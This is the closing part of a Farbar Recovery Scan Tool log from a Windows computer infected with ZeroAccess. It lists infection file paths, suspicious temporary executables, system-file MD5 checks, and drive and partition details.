ZeroAccess:C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000000.@C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000032.@C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000064.@C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\00000004.@C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\1afb2d56C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\201d3dde ZeroAccess:C:\Users\WTs Guns\AppData\Local\{21d795b1-cb65-1fe9-782f-dd55be9fe90a} Files to move or delete:====================C:\ProgramData\hTew6txG06C4.dllC:\ProgramData\p2hbAwRM06C4.dllC:\Users\WTs Guns\aaaaaaaa.exe Some files in TEMP:====================C:\Users\WTs Guns\AppData\Local\Temp\3fffb56d-6b40-4cd3-b5fb-0ac36bf72961.exeC:\Users\WTs Guns\AppData\Local\Temp\6013073.exeC:\Users\WTs Guns\AppData\Local\Temp\76FA.tmp.exeC:\Users\WTs Guns\AppData\Local\Temp\Abspdf.exeC:\Users\WTs Guns\AppData\Local\Temp\acfpdfu.dllC:\Users\WTs Guns\AppData\Local\Temp\acfpdfuamd64.dllC:\Users\WTs Guns\AppData\Local\Temp\acfpdfui.dllC:\Users\WTs Guns\AppData\Local\Temp\acfpdfuia64.dllC:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiamd64.dllC:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiia64.dllC:\Users\WTs Guns\AppData\Local\Temp\ApnStub.exeC:\Users\WTs Guns\AppData\Local\Temp\avguidx.dllC:\Users\WTs Guns\AppData\Local\Temp\C07A.tmp.exeC:\Users\WTs Guns\AppData\Local\Temp\cdintf.dllC:\Users\WTs Guns\AppData\Local\Temp\CommonInstaller.exeC:\Users\WTs Guns\AppData\Local\Temp\csrsss.exeC:\Users\WTs Guns\AppData\Local\Temp\docviewe.exeC:\Users\WTs Guns\AppData\Local\Temp\install_flash_player_18_active_x.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exeC:\Users\WTs Guns\AppData\Local\Temp\MachineIdCreator.exeC:\Users\WTs Guns\AppData\Local\Temp\oi_{2D24F029-B2B5-4807-A2F5-C3CDF78AE31D}.exeC:\Users\WTs Guns\AppData\Local\Temp\PDFPRT400.exeC:\Users\WTs Guns\AppData\Local\Temp\readSTILog.dllC:\Users\WTs Guns\AppData\Local\Temp\ToolbarInstaller.exeC:\Users\WTs Guns\AppData\Local\Temp\UNINSTALL.EXEC:\Users\WTs Guns\AppData\Local\Temp\xmllite.dll ==================== Known DLLs (Whitelisted) ========================= ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => MD5 is legitC:\Windows\System32\wininit.exe => MD5 is legitC:\Windows\SysWOW64\wininit.exe => MD5 is legitC:\Windows\explorer.exe => MD5 is legitC:\Windows\SysWOW64\explorer.exe => MD5 is legitC:\Windows\System32\svchost.exe => MD5 is legitC:\Windows\SysWOW64\svchost.exe => MD5 is legitC:\Windows\System32\services.exe => MD5 is legitC:\Windows\System32\User32.dll => MD5 is legitC:\Windows\SysWOW64\User32.dll => MD5 is legitC:\Windows\System32\userinit.exe => MD5 is legitC:\Windows\SysWOW64\userinit.exe => MD5 is legitC:\Windows\System32\rpcss.dll => MD5 is legitC:\Windows\System32\dnsapi.dll => MD5 is legitC:\Windows\SysWOW64\dnsapi.dll => MD5 is legitC:\Windows\System32\Drivers\volsnap.sys => MD5 is legit ==================== Restore Points ========================= ==================== Memory info =========================== Percentage of memory in use: 11%Total physical RAM: 6108.98 MBAvailable physical RAM: 5384.06 MBTotal Virtual: 6107.13 MBAvailable Virtual: 5387.99 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:683.95 GB) (Free:469.29 GB) NTFSDrive f: (USB20FD) (Removable) (Total:7.51 GB) (Free:7.5 GB) FAT32Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFSDrive y: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:9.24 GB) NTFS ==>[system with boot components (obtained from reading drive)] ==================== MBR & Partition Table ================== ========================================================Disk: 0 (Size: 698.6 GB) (Disk ID: 78033E78)Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)Partition 2: (Active) - (Size=14.6 GB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=683.9 GB) - (Type=07 NTFS) ========================================================Disk: 1 (Size: 7.5 GB) (Disk ID: 04DD5721)Partition 1: (Active) - (Size=7.5 GB) - (Type=0C) LastRegBack: 2015-09-11 08:32 ==================== End of FRST.txt ============================